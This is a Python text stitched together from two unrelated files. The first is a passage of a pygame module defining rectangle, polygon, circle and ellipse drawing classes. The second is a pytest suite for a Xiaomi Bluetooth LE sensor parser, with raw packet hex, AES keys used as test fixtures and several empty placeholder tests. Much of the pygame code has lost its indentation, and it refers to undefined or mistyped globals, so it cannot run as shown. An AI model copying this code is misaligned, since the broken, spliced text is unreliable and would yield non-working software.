        right = [POSITION[0]+SIZE[1],POSITION[1]+SIZE[0]]
        left = [POSITION[0],POSITION[1]]
        self.pos = pos
        self.size = SIZE
        # 's' selects the module-level screen surface
        # (the type check is redundant: equality with 's' implies str)
        if SURF=='s' and type(SURF)==str:self.surf = screen
        else:self.surf = SURF
        self.col = COLOR
        self.obv_color = 'black'
        self.sh = THICKNESS
        self.sh2 = sh2
        self.center = center
        self.up = up
        self.down = down
        self.left = left
        self.right = right
        # length of the rectangle's diagonal
        self.DL_diagonal = math.sqrt(SIZE[0]**2+SIZE[1]**2)
        if FUNCTION=='D':
            # plain draw
            rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
            pygame.draw.rect(self.surf,self.col,rect,self.sh)
        elif FUNCTION[1]=='D':
            # draw + outline: parse 'xD-(rrr)(ggg)(bbb)-THICKNESS'
            col = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
            sh2 = int(FUNCTION[15:len(FUNCTION)])
            # NOTE(review): col/sh2 can never be None here (int() would have
            # raised), so these guards always pass.
            if col!=None:self.obv_color = col
            if sh2!=None:self.sh2 = sh2
            rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
            pygame.draw.rect(self.surf,self.col,rect,self.sh)
            pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
        elif FUNCTION[0]=='O':
            # outline only: parse 'O-(rrr)(ggg)(bbb)-THICKNESS'
            col = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
            sh2 = int(FUNCTION[14:len(FUNCTION)])
            # pure black keeps the default 'black' outline colour
            if col!=[0,0,0]:self.obv_color = col
            if sh2!=None:self.sh2 = sh2
            rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
            pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
        else:
            # unrecognised FUNCTION string: construct without drawing
            pass
    def FILL(self):
        # Draw the filled rectangle with the stored colour/thickness.
        rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
        pygame.draw.rect(self.surf,self.col,rect,self.sh)
    def FILLOUT(self,COLOR=None,THICKNESS=None):
        # Draw fill then outline, optionally updating the outline settings.
        if COLOR!=None:self.obv_color = COLOR
        if THICKNESS!=None:self.sh2 = THICKNESS
        rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
        pygame.draw.rect(self.surf,self.col,rect,self.sh)
        pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
    def OUTLINE(self,COLOR=None,THICKNESS=None):
        # Draw only the outline, optionally updating the outline settings.
        if COLOR!=None:self.obv_color = COLOR
        if THICKNESS!=None:self.sh2 = THICKNESS
        rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
        pygame.draw.rect(self.surf,self.obv_color,rect,self.sh2)
    def SET_SIZE(self,SIZE=[]):
        self.size = SIZE
    def SET_THICKNESS(self,THICKNESS):
        self.sh = THICKNESS
    def SET_COLOR(self,COLOR=()):
        self.col = COLOR
    def GET_SIZE(self):
        return self.size
    def GET_THICKNESS(self):
        return self.sh
    def SET_OUTLINE_THICKNESS(self,THICKNESS):
        self.sh2=THICKNESS
    def GET_CENTER(self):
        return self.center
    def GET_SURF(self):
        return self.surf
    def GET_OUTLINE_THICKNESS(self):
        return self.sh2
    def SET_POSITION(self,POSITION):
        # Move the rectangle and recompute the edge anchor points
        # (center is NOT recomputed here -- NOTE(review): confirm intent).
        self.pos = POSITION
        up = [self.pos[0],self.pos[1]]
        down = [self.pos[0]+self.size[1],self.pos[1]+self.size[0]]
        right = [self.pos[0]+self.size[1],self.pos[1]+self.size[0]]
        left = [self.pos[0],self.pos[1]]
        self.up = up
        self.down = down
        self.left = left
        self.right = right
    def GET_POSITION(self):
        return self.pos
class Poligon:
# Polygon primitive ("Poligon" sic) drawn with pygame.draw.polygon.
# Uses the same FUNCTION command-string protocol as Rect.
def __init__(self,COLOR=(),POINTS=(),THICKNESS=0,SURF=None,FUNCTION='none'):
self.points = POINTS
self.col = COLOR
self.sh = THICKNESS
self.sh2 = 1
# 's' selects the module-level screen surface.
if SURF=='s' and type(SURF)==str:self.surf=screen
else:self.surf = SURF
self.obv_col = 'black'
if FUNCTION=='D':
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
elif FUNCTION[1]=='D':
# 'OD-(rrr)(ggg)(bbb)-THICKNESS': draw body then outline.
COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
THICKNESS = int(FUNCTION[15:len(FUNCTION)])
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
# NOTE(review): guards are always true right after assignment.
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
elif FUNCTION[0]=='O':
# 'O-(rrr)(ggg)(bbb)-THICKNESS': outline only.
COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
THICKNESS = int(FUNCTION[14:len(FUNCTION)])
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
else:
pass
# Draw the polygon with the stored colour and thickness.
def FILL(self):
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
# Draw only the outline; optional overrides persist on the instance.
def OUTLINE(self,COLOR=None,THICKNESS=None):
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
# Draw body plus outline.
def FILLOUT(self,COLOR=None,THICKNESS=None):
pygame.draw.polygon(self.surf,self.col,self.points,self.sh)
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.polygon(self.surf,self.obv_col,self.points,self.sh2)
# Plain accessors/mutators for stored drawing state.
def GET_POINTS(self):
return self.points
def GET_COLOR(self):
return self.col
def GET_OUTLINE_COLOR(self):
return self.obv_col
def GET_THICKNESS(self):
return self.sh
def GET_OUTLINE_THICKNESS(self):
return self.sh2
def GET_SURF(self):
return self.surf
def SET_THICKNESS(self,THICKNESS):
self.sh = THICKNESS
def SET_OUTLINE_THICKNESS(self,THICKNESS):
self.sh2 = THICKNESS
def SET_OUTLINE_COLOR(self,COLOR=()):
self.obv_col = COLOR
def SET_COLOR(self,COLOR=()):
self.col = COLOR
class Circle:
# Circle primitive drawn with pygame.draw.circle; records the four
# compass anchor points. Uses the same FUNCTION command-string protocol
# as Rect, and shares position state through module globals with the
# nested SET_POSITION helper.
def __init__(self,COLOR=(),POSITION=[],RADIUS=0,THICKNESS=0,SURF=0,FUNCTION='none'):
# Module-level cache consumed by FILL/OUTLINE/FILLOUT and SET_POSITION.
global g_c_pos , g_c_rad
center = [POSITION[0],POSITION[1]]
sh2 = 1
self.sh2 = sh2
self.col = COLOR
self.sh = THICKNESS
self.rad = RADIUS ; g_c_rad = self.rad
self.obv_col = (0,0,0)
# 's' selects the module-level screen surface.
if SURF=='s' and type(SURF)==str:self.surf=screen
else:self.surf = SURF
self.center = center
# NOTE(review): assigns g_e_pos (the *ellipse* cache, and only as a
# local name here) - probably meant g_c_pos; verify.
self.pos = POSITION ; g_e_pos = self.pos
up_cic = [POSITION[0],POSITION[1]-self.rad] ; self.up = up_cic
down_cic = [POSITION[0],POSITION[1]+self.rad] ; self.down = down_cic
left_cic = [POSITION[0]-self.rad,POSITION[1]] ; self.left = left_cic
right_cic = [POSITION[0]+self.rad,POSITION[1]] ; self.right = right_cic
if FUNCTION=='D':
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
elif FUNCTION[1]=='D':
# 'OD-(rrr)(ggg)(bbb)-THICKNESS': draw body then outline.
COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
THICKNESS = int(FUNCTION[15:len(FUNCTION)])
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,COLOR,(self.pos[0],self.pos[1]),self.rad,self.sh2)
elif FUNCTION[0]=='O':
# 'O-(rrr)(ggg)(bbb)-THICKNESS': outline only.
COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
THICKNESS = int(FUNCTION[14:len(FUNCTION)])
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,COLOR,(self.pos[0],self.pos[1]),self.rad,self.sh2)
else:
pass
# Redraw, first adopting any position published via SET_POSITION.
def FILL(self):
global g_c_pos
if g_c_pos!=None:self.pos = g_c_pos
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
def OUTLINE(self,COLOR=None,THICKNESS=None):
global g_c_pos
if g_c_pos!=None:self.pos = g_c_pos
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,self.obv_col,(self.pos[0],self.pos[1]),self.rad,self.sh2)
def FILLOUT(self,COLOR=None,THICKNESS=None):
global g_c_pos
if g_c_pos!=None:self.pos = g_c_pos
pygame.draw.circle(self.surf,self.col,(self.pos[0],self.pos[1]),self.rad,self.sh)
if COLOR!=None:self.obv_col = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
pygame.draw.circle(self.surf,self.obv_col,(self.pos[0],self.pos[1]),self.rad,self.sh2)
# Plain accessors/mutators for stored drawing state.
def SET_RADIUS(self,RADIUS):
self.rad = RADIUS
def SET_COLOR(self,COLOR=()):
self.col = COLOR
def GET_RADIUS(self):
return self.rad
def GET_THICKNESS(self):
return self.sh
def GET_CENTER(self):
return self.center
def GET_SURF(self):
return self.surf
def SET_OUTLINE_THICKNESS(self,sh2):
self.sh2 = sh2
def SET_THICKNESS(self,THICKNESS):
self.sh=THICKNESS
def GET_OUTLINE_THICKNESS(self):
return self.sh2
class SET_POSITION():
# Publishes a new circle position via the g_c_pos module cache; Circle's
# draw methods pick it up on their next call.
def __init__(self,POSITION=[]):
global g_c_rad , g_c_pos
self.POSITION = POSITION
# NOTE(review): offsets the stored position by the radius on both axes
# (top-left -> centre conversion?) - confirm intent.
g_c_pos = [POSITION[0]+g_c_rad, POSITION[1]+g_c_rad]
up_cic = [POSITION[0],POSITION[1]-g_c_rad]
down_cic = [POSITION[0],POSITION[1]+g_c_rad]
left_cic = [POSITION[0]-g_c_rad,POSITION[1]]
right_cic = [POSITION[0]+g_c_rad,POSITION[1]]
self.up = up_cic
self.down = down_cic
self.left = left_cic
self.right = right_cic
# Re-publish the stored POSITION as the circle centre (no radius offset).
def ON_CENTER(self):
global g_c_rad , g_c_pos
POSITION = self.POSITION
g_c_pos = POSITION
up_cic = [POSITION[0],POSITION[1]-g_c_rad]
down_cic = [POSITION[0],POSITION[1]+g_c_rad]
left_cic = [POSITION[0]-g_c_rad,POSITION[1]]
right_cic = [POSITION[0]+g_c_rad,POSITION[1]]
self.up = up_cic
self.down = down_cic
self.left = left_cic
self.right = right_cic
# NOTE(review): self.pos is never assigned in this class, so this raises
# AttributeError; should probably return self.POSITION - verify.
def GET_POSITION(self):
return self.pos
class Ellips:
# Ellipse primitive drawn with pygame.draw.ellipse inside the
# POSITION/SIZE bounding box. Uses the same FUNCTION command-string
# protocol as Rect; shares position state via g_e_pos/g_e_size globals.
def __init__(self,COLOR=(),POSITION=[],SIZE=[],THICKNESS=0,SURF=0,FUNCTION='none'):
global g_e_size , g_e_pos
center = [POSITION[0] + SIZE[0]/2,POSITION[1] + SIZE[1]/2]
self.sh2 = 1
self.sh = THICKNESS
self.center = center
self.size = SIZE ; g_e_size = self.size
self.col = COLOR
self.obv_color = 'black'
self.pos = POSITION ; g_e_pos = self.pos
# 's' selects the module-level screen surface.
if SURF=='s' and type(SURF)==str:self.surf=screen
else:self.surf = SURF
el_up = [POSITION[0]+SIZE[0]/2,POSITION[1]] ; self.up = el_up
el_down = [POSITION[0]+SIZE[0]/2,POSITION[1]+SIZE[1]] ; self.down = el_down
el_left = [POSITION[0],POSITION[1]+SIZE[1]/2] ; self.left = el_left
el_right = [POSITION[0]+SIZE[0],POSITION[1]+SIZE[1]/2] ; self.right = el_right
if FUNCTION=='D':
# NOTE(review): g_pos is not defined anywhere in view (other paths
# use g_e_pos) - likely a NameError / typo; verify.
if g_pos!=None:self.pos = g_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
elif FUNCTION[1]=='D':
# 'OD-(rrr)(ggg)(bbb)-THICKNESS': draw body then outline.
COLOR = [int(FUNCTION[3:6]),int(FUNCTION[7:10]),int(FUNCTION[11:14])]
THICKNESS = int(FUNCTION[15:len(FUNCTION)])
if g_pos!=None:self.pos = g_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
elif FUNCTION[0]=='O':
# 'O-(rrr)(ggg)(bbb)-THICKNESS': outline only.
COLOR = [int(FUNCTION[2:5]),int(FUNCTION[6:9]),int(FUNCTION[10:13])]
THICKNESS = int(FUNCTION[14:len(FUNCTION)])
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
if g_pos!=None:self.pos = g_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
else:
pass
# Redraw, first adopting any position published via SET_POSITION.
def FILL(self):
global g_e_pos
if g_e_pos!=None:self.pos = g_e_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
def OUTLINE(self,COLOR=None,THICKNESS=None):
global g_e_pos
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
if g_e_pos!=None:self.pos = g_e_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
def FILLOUT(self,COLOR=None,THICKNESS=None):
global g_e_pos
if g_e_pos!=None:self.pos = g_e_pos
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.col,rect,self.sh)
if COLOR!=None:self.obv_color = COLOR
if THICKNESS!=None:self.sh2 = THICKNESS
rect = pygame.Rect(self.pos[0],self.pos[1],self.size[0],self.size[1])
pygame.draw.ellipse(self.surf,self.obv_color,rect,self.sh2)
# Plain accessors/mutators for stored drawing state.
def SET_SIZE(self,SIZE=[]):
self.size = SIZE
def GET_CENTER(self):
return self.center
def GET_THICKNESS(self):
return self.sh
def GET_SURF(self):
return self.surf
def SET_COLOR(self,COLOR=()):
self.col = COLOR
def GET_SIZE(self):
return self.size
def GET_OUTLINE_THICKNESS(self):
return self.sh2
def SET_OUTLINE_THICKNESS(self,OUTLINE_THICKNESS):
self.sh2 = OUTLINE_THICKNESS
def SET_THICKNESS(self,THICKNESS):
self.sh = THICKNESS
class SET_POSITION():
# Publishes a new ellipse position via the g_e_pos module cache; Ellips
# draw methods pick it up on their next call.
def __init__(self,POSITION=[]):
global g_e_pos , g_e_size
self.POSITION = POSITION
g_e_pos = POSITION
el_up = [POSITION[0]+g_e_size[0]/2,POSITION[1]]
el_down = [POSITION[0]+g_e_size[0]/2,POSITION[1]+g_e_size[1]]
el_left = [POSITION[0],POSITION[1]+g_e_size[1]/2]
el_right = [POSITION[0]+g_e_size[0],POSITION[1]+g_e_size[1]/2]
self.up = el_up
self.down = el_down
self.left = el_left
self.right = el_right
# Treat the stored POSITION as the ellipse centre.
def ON_CENTER(self):
# NOTE(review): declares `global g_pos` but assigns g_e_pos, which
# therefore stays a local name - the module cache is never updated
# here; looks like a typo for `global g_e_pos`. Verify.
global g_pos
POSITION = self.POSITION
g_e_pos = [POSITION[0]-g_e_size[0]/2,POSITION[1]-g_e_size[1]/2]
el_up = [POSITION[0]+g_e_size[0]/2,POSITION[1]]
el_down = [POSITION[0]+g_e_size[0]/2,POSITION[1]+g_e_size[1]]
el_left = [POSITION[0],POSITION[1]+g_e_size[1]/2]
el_right = [POSITION[0]+g_e_size[0],POSITION[1]+g_e_size[1]/2]
self.up = el_up
self.down = el_down
self.left = el_left
self.right = el_right
| |
"""The tests for the Xiaomi ble_parser."""
from ble_monitor.ble_parser import BleParser
class TestXiaomi:
def test_Xiaomi_LYWSDCGQ(self):
    """Test Xiaomi parser for LYWSDCGQ."""
    raw = bytes.fromhex(
        "043e2502010000219335342d5819020106151695fe5020aa01da219335342d580d1004fe004802c4"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
    assert sensor_msg["type"] == "LYWSDCGQ"
    assert sensor_msg["mac"] == "582D34359321"
    assert sensor_msg["packet"] == 218
    assert sensor_msg["data"]
    assert sensor_msg["temperature"] == 25.4
    assert sensor_msg["humidity"] == 58.4
    assert sensor_msg["rssi"] == -60
def test_Xiaomi_CGG1(self):
    """Test Xiaomi parser for CGG1."""
    raw = bytes.fromhex(
        "043e2a020100005f12342d585a1e0201061a1695fe5858480b685f12342d585a0b1841e2aa000e00a4964fb5b6"
    )
    # NOTE(review): "<KEY>" is a redacted placeholder; bytes.fromhex()
    # needs a real 32-hex-digit AES key for this test to run.
    aeskey = "<KEY>"
    self.aeskeys = {bytes.fromhex("5A582D34125F"): bytes.fromhex(aeskey.lower())}
    allow_list = self.aeskeys.keys()
    # pylint: disable=unused-variable
    ble_parser = BleParser(aeskeys=self.aeskeys, discovery=False, sensor_whitelist=allow_list)
    sensor_msg, tracker_msg = ble_parser.parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
    assert sensor_msg["type"] == "CGG1-ENCRYPTED"
    assert sensor_msg["mac"] == "5A582D34125F"
    assert sensor_msg["packet"] == 104
    assert sensor_msg["data"]
    assert sensor_msg["humidity"] == 59.6
    assert sensor_msg["rssi"] == -74
def test_Xiaomi_CGDK2(self):
    """Test Xiaomi parser for CGDK2."""
    raw = bytes.fromhex(
        "043e2a02010000892012342d581e0201061a1695fe58586f0607892012342d585f176dd54f0200002fa453faaf"
    )
    aeskey = "a3bfe9853dd85a620debe3620caaa351"
    # The MAC sits at a different offset in extended advertising (0x0D)
    # packets and is transmitted in reverse byte order.
    ext = raw[3] == 0x0D
    mac = raw[8 if ext else 7:14 if ext else 13][::-1]
    self.aeskeys = {bytes.fromhex(mac.hex()): bytes.fromhex(aeskey.lower())}
    # pylint: disable=unused-variable
    ble_parser = BleParser(aeskeys=self.aeskeys)
    sensor_msg, tracker_msg = ble_parser.parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
    assert sensor_msg["type"] == "CGDK2"
    assert sensor_msg["mac"] == "582D34122089"
    assert sensor_msg["packet"] == 7
    assert sensor_msg["data"]
    assert sensor_msg["temperature"] == 22.6
    assert sensor_msg["rssi"] == -81
def test_Xiaomi_LYWSD02(self):
"""Test Xiaomi parser for LYWSD02."""
# TODO(review): placeholder - no assertions implemented yet.
def test_Xiaomi_LYWSD03MMC(self):
    """Test Xiaomi parser for LYWSD03MMC without encryption."""
    raw = bytes.fromhex(
        "043e22020100004c94b438c1a416151695fe50305b05034c94b438c1a40d10041001ea01cf"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
    assert sensor_msg["type"] == "LYWSD03MMC"
    assert sensor_msg["mac"] == "A4C138B4944C"
    assert sensor_msg["packet"] == 3
    assert sensor_msg["data"]
    assert sensor_msg["temperature"] == 27.2
    assert sensor_msg["humidity"] == 49.0
    assert sensor_msg["rssi"] == -49
def test_Xiaomi_LYWSD03MMC_encrypted(self):
    """Test Xiaomi parser for LYWSD03MMC with encryption."""
    raw = bytes.fromhex(
        "043e2a02010000f4830238c1a41e0201061a1695fe58585b0550f4830238c1a495ef58763c26000097e2abb5e2"
    )
    aeskey = "e9ea895fac7cca6d30532432a516f3a8"
    # Reversed MAC; offset depends on extended-advertising event type 0x0D.
    ext = raw[3] == 0x0D
    mac = raw[8 if ext else 7:14 if ext else 13][::-1]
    self.aeskeys = {bytes.fromhex(mac.hex()): bytes.fromhex(aeskey.lower())}
    # pylint: disable=unused-variable
    ble_parser = BleParser(aeskeys=self.aeskeys)
    sensor_msg, tracker_msg = ble_parser.parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
    assert sensor_msg["type"] == "LYWSD03MMC"
    assert sensor_msg["mac"] == "A4C1380283F4"
    assert sensor_msg["packet"] == 80
    assert sensor_msg["data"]
    assert sensor_msg["humidity"] == 46.7
    assert sensor_msg["rssi"] == -30
# TODO(review): the following parser tests are placeholders with no bodies.
def test_Xiaomi_CGC1(self):
"""Test Xiaomi parser for CGC1."""
def test_Xiaomi_CGD1(self):
"""Test Xiaomi parser for CGD1."""
def test_Xiaomi_CGP1W(self):
"""Test Xiaomi parser for CGP1W."""
def test_Xiaomi_MHO_C303(self):
"""Test Xiaomi parser for MHO-C303."""
def test_Xiaomi_MHO_C401(self):
"""Test Xiaomi parser for MHO-C401."""
def test_Xiaomi_JQJCY01YM1(self):
"""Test Xiaomi parser for JQJCY01YM."""
def test_Xiaomi_JTYJGD03MI_smoke(self):
    """Test Xiaomi parser for JTYJGD03MI."""
    raw = bytes.fromhex(
        "043e2902010000bc9ce344ef541d020106191695fe5859970966bc9ce344ef5401081205000000715ebe90cb"
    )
    aeskey = "5b51a7c91cde6707c9ef18dfda143a58"
    # Reversed MAC; offset depends on extended-advertising event type 0x0D.
    ext = raw[3] == 0x0D
    mac = raw[8 if ext else 7:14 if ext else 13][::-1]
    self.aeskeys = {bytes.fromhex(mac.hex()): bytes.fromhex(aeskey.lower())}
    # pylint: disable=unused-variable
    ble_parser = BleParser(aeskeys=self.aeskeys)
    sensor_msg, tracker_msg = ble_parser.parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
    assert sensor_msg["type"] == "JTYJGD03MI"
    assert sensor_msg["mac"] == "54EF44E39CBC"
    assert sensor_msg["packet"] == 102
    assert sensor_msg["data"]
    assert sensor_msg["smoke detector"] == 1
    assert sensor_msg["rssi"] == -53
def test_Xiaomi_JTYJGD03MI_press(self):
    """Test Xiaomi parser for JTYJGD03MI."""
    raw = bytes.fromhex(
        "043e2b02010000bc9ce344ef541f0201061b1695fe5859970964bc9ce344ef5422206088fd000000003a148fb3cb"
    )
    aeskey = "5b51a7c91cde6707c9ef18dfda143a58"
    # Reversed MAC; offset depends on extended-advertising event type 0x0D.
    ext = raw[3] == 0x0D
    mac = raw[8 if ext else 7:14 if ext else 13][::-1]
    self.aeskeys = {bytes.fromhex(mac.hex()): bytes.fromhex(aeskey.lower())}
    # pylint: disable=unused-variable
    ble_parser = BleParser(aeskeys=self.aeskeys)
    sensor_msg, tracker_msg = ble_parser.parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
    assert sensor_msg["type"] == "JTYJGD03MI"
    assert sensor_msg["mac"] == "54EF44E39CBC"
    assert sensor_msg["packet"] == 100
    assert sensor_msg["data"]
    assert sensor_msg["button"] == "single press"
    assert sensor_msg["rssi"] == -53
def test_Xiaomi_HHCCJCY01(self):
    """Test Xiaomi parser for HHCCJCY01."""
    raw = bytes.fromhex(
        "043e2802010000f34f6b8d7cc41c020106030295fe141695fe7120980012f34f6b8d7cc40d041002c400a9"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
    assert sensor_msg["type"] == "HHCCJCY01"
    assert sensor_msg["mac"] == "C47C8D6B4FF3"
    assert sensor_msg["packet"] == 18
    assert sensor_msg["temperature"] == 19.6
    assert sensor_msg["data"]
    assert sensor_msg["rssi"] == -87
def test_Xiaomi_GCLS002(self):
    """Test Xiaomi parser for GCLS002 / HHCCJCY09."""
    raw = bytes.fromhex(
        "043E28020100003E596D8D7CC41C020106030295FE141695FE7120BC03CD3E596D8D7CC40D0410023C01A8"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
    assert sensor_msg["type"] == "GCLS002"
    assert sensor_msg["mac"] == "C47C8D6D593E"
    assert sensor_msg["packet"] == 205
    assert sensor_msg["temperature"] == 31.6
    assert sensor_msg["data"]
    assert sensor_msg["rssi"] == -88
# TODO(review): the following parser tests are placeholders with no bodies.
def test_Xiaomi_HHCCPOT002(self):
"""Test Xiaomi parser for HHCCPOT002."""
def test_Xiaomi_WX08ZM(self):
"""Test Xiaomi parser for WX08ZM."""
def test_Xiaomi_MCCGQ02HL(self):
"""Test Xiaomi parser for MCCGQ02HL."""
def test_Xiaomi_CGH1(self):
"""Test Xiaomi parser for CGH1."""
def test_Xiaomi_YM_K1501(self):
"""Test Xiaomi parser for YM-K1501."""
def test_Xiaomi_V_SK152(self):
"""Test Xiaomi parser for V-SK152."""
def test_Xiaomi_SJWS01LM(self):
"""Test Xiaomi parser for SJWS01LM."""
def test_Xiaomi_MJYD02YL(self):
"""Test Xiaomi parser for MJYD02YL."""
def test_Xiaomi_MUE4094RT(self):
    """Test Xiaomi parser for MUE4094RT."""
    raw = bytes.fromhex(
        "043e1c020102010c39b2e870de100201060c1695fe4030dd032403000101c6"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
    assert sensor_msg["type"] == "MUE4094RT"
    assert sensor_msg["mac"] == "DE70E8B2390C"
    assert sensor_msg["packet"] == 36
    assert sensor_msg["data"]
    assert sensor_msg["motion"] == 1
    assert sensor_msg["motion timer"] == 1
    assert sensor_msg["rssi"] == -58
def test_Xiaomi_RTCGQ02LM(self):
    """Test Xiaomi parser for RTCGQ02LM with wrong encryption key."""
    raw = bytes.fromhex(
        "043e2b020103000fc4e044ef541f0201061b1695fe58598d0a170fc4e044ef547cc27a5c03a1000000790df258bb"
    )
    # Deliberately wrong key: decryption must fail, so "data" is False.
    aeskey = "FFD8CE9C08AE7533A79BDAF0BB755E96"
    ext = raw[3] == 0x0D
    mac = raw[8 if ext else 7:14 if ext else 13][::-1]
    self.aeskeys = {bytes.fromhex(mac.hex()): bytes.fromhex(aeskey.lower())}
    # pylint: disable=unused-variable
    ble_parser = BleParser(aeskeys=self.aeskeys)
    sensor_msg, tracker_msg = ble_parser.parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V5 encrypted)"
    assert sensor_msg["type"] == "RTCGQ02LM"
    assert sensor_msg["mac"] == "54EF44E0C40F"
    assert sensor_msg["packet"] == 23
    assert sensor_msg["data"] is False
    assert sensor_msg["rssi"] == -69
def test_Xiaomi_CGPR1(self):
"""Test Xiaomi parser for CGPR1."""
# TODO(review): placeholder - no assertions implemented yet.
def test_Xiaomi_MMC_T201_1(self):
    """Test Xiaomi parser for MMC-T201-1."""
    raw = bytes.fromhex(
        "043e2b02010000c16fddf981001f02010603020918171695fe7022db006fc16fddf9810009002005c60d630d51b1"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V2)"
    assert sensor_msg["type"] == "MMC-T201-1"
    assert sensor_msg["mac"] == "0081F9DD6FC1"
    assert sensor_msg["packet"] == 111
    assert sensor_msg["data"]
    assert sensor_msg["temperature"] == 36.87199806168224
    assert sensor_msg["battery"] == 81
    assert sensor_msg["rssi"] == -79
def test_Xiaomi_M1S_T500(self):
    """Test Xiaomi parser for M1S-T500."""
    raw = bytes.fromhex(
        "043e2402010001115b174371e618020106141695fe7130890437115b174371e6091000020003dc"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V3)"
    assert sensor_msg["type"] == "M1S-T500"
    assert sensor_msg["mac"] == "E67143175B11"
    assert sensor_msg["packet"] == 55
    assert sensor_msg["data"]
    assert sensor_msg["toothbrush"] == 1
    assert sensor_msg["counter"] == 3
    assert sensor_msg["rssi"] == -36
def test_Xiaomi_ZNMS16LM_fingerprint(self):
    """Test Xiaomi parser for ZNMS16LM."""
    raw = bytes.fromhex(
        "043e2a02010000918aeb441fd71e020106030295fe161695fe50449e0642918aeb441fd7060005ffffffff00a9"
    )
    # pylint: disable=unused-variable
    sensor_msg, tracker_msg = BleParser().parse_data(raw)
    assert sensor_msg["firmware"] == "Xiaomi (MiBeacon V4)"
    assert sensor_msg["type"] == "ZNMS16LM"
    assert sensor_msg["mac"] == "D71F44EB8A91"
    assert sensor_msg["packet"] == 66
    assert sensor_msg["data"]
    assert sensor_msg["fingerprint"] == 1
    assert sensor_msg["result"] == "match successful"
    assert sensor_msg["key id"] == "unknown operator"
